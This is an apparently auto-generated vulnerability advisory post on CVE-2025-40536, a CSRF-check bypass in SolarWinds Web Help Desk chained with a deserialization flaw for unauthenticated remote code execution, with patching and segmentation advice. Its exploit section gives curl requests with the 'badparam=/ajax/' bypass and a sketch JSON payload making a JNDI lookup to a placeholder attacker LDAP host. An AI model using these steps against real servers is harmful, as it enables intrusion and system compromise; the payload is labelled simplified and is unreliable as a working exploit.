SolarWinds, Security Control Bypass, CVE-2025-40536 (HIGH)

Listen to this Post

CVE-2025-40536 is a security control bypass vulnerability in SolarWinds Web Help Desk that allows an unauthenticated attacker to circumvent existing access restrictions . The flaw resides in the `checkCsrfTokenWo()` function, a CSRF validation routine that also checks query parameters against a whitelist . An attacker can bypass this validation by injecting a specific fake URI parameter containing the value “/ajax/” into a request . Once this protection is bypassed, the attacker can use the `wopage` parameter to directly load and interact with restricted WebObjects components, such as LoginPref, without proper authentication . This bypass is critical as it serves as an initial step to reach more dangerous functionality. By gaining access to these internal components, an attacker can then trigger file uploads and create instances of the AjaxProxy . This access effectively opens the door to chaining this bypass with other vulnerabilities, like insecure deserialization (CVE-2025-40551), to achieve unauthenticated remote code execution on the host system .

dailycve form:

Platform: SolarWinds Web Help Desk
Version: prior to 2026.1
Vulnerability : security control bypass
Severity: HIGH
date: Jan 29, 2026

Prediction: Patched in 2026.1

What Undercode Say:

Analytics:

  • Vulnerability Type: Security Control Bypass leading to Authentication Bypass and potential RCE
  • Attack Vector: Network
  • Privileges Required: None
  • User Interaction: None
  • CWE: Improper Access Control (Generic)

Exploit:

The core of the exploit is chaining the bypass with a deserialization vulnerability. The attack flow is as follows :
1. Establish Session: Send an initial request to obtain a valid session ID (wosid) and CSRF token.

Example request to get a session (simplified)
curl -v 'http://<target>/helpdesk/WebObjects/Helpdesk.woa'

2. Bypass CSRF and Access Component: Use the `badparam` injection to bypass the CSRF check and access the `LoginPref` component directly. This step uses the session ID obtained earlier .

Inject the bad parameter to bypass security and load the LoginPref page
curl -v 'http://<target>/helpdesk/WebObjects/Helpdesk.woa/wo/test.wo/<wosid>/1.0?badparam=/ajax/&wopage=LoginPref'

3. Trigger Deserialization: Once access is gained, a crafted JSON payload is sent to the AjaxProxy’s JSONRPC bridge. This payload bypasses blacklists (e.g., by using a whitelisted term like java.lang.Number) and contains a malicious Java object. When deserialized, it triggers a JNDI lookup, leading to remote code execution .

// Example structure of a malicious JSON payload sent to the jsonrpc_endpoint
{
"method": "jsonrpcBridge.method",
"params": [{
"java.lang.Number": [{
"object": {
"jndiName": "ldap://<attacker_ip>:<port>/Exploit"
}
}]
}],
"jsonrpc": "2.0"
}

Protection from this CVE:

  1. Patch Immediately: Update SolarWinds Web Help Desk to version 2026.1 or later, which contains the official fix for these vulnerabilities .
  2. Network Segmentation: If immediate patching is not possible, restrict network access to the Web Help Desk application. Block external access to the `/helpdesk/WebObjects/` path and limit access to trusted internal networks or VPN users only .
  3. IPS Signatures: Deploy Intrusion Prevention System (IPS) signatures to detect and block exploitation attempts. Specific signatures for these vulnerabilities have been released by security vendors .

Impact:

Successful exploitation of this vulnerability chain (CVE-2025-40536 and CVE-2025-40551) allows a remote, unauthenticated attacker to achieve full remote code execution on the SolarWinds Web Help Desk server . This grants the attacker the ability to run arbitrary operating system commands, potentially leading to full system compromise, data theft, installation of backdoors, and further movement within the internal network . Given that Web Help Desk is often internet-facing and stores sensitive IT and service desk data, the impact on an organization’s security posture is severe .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top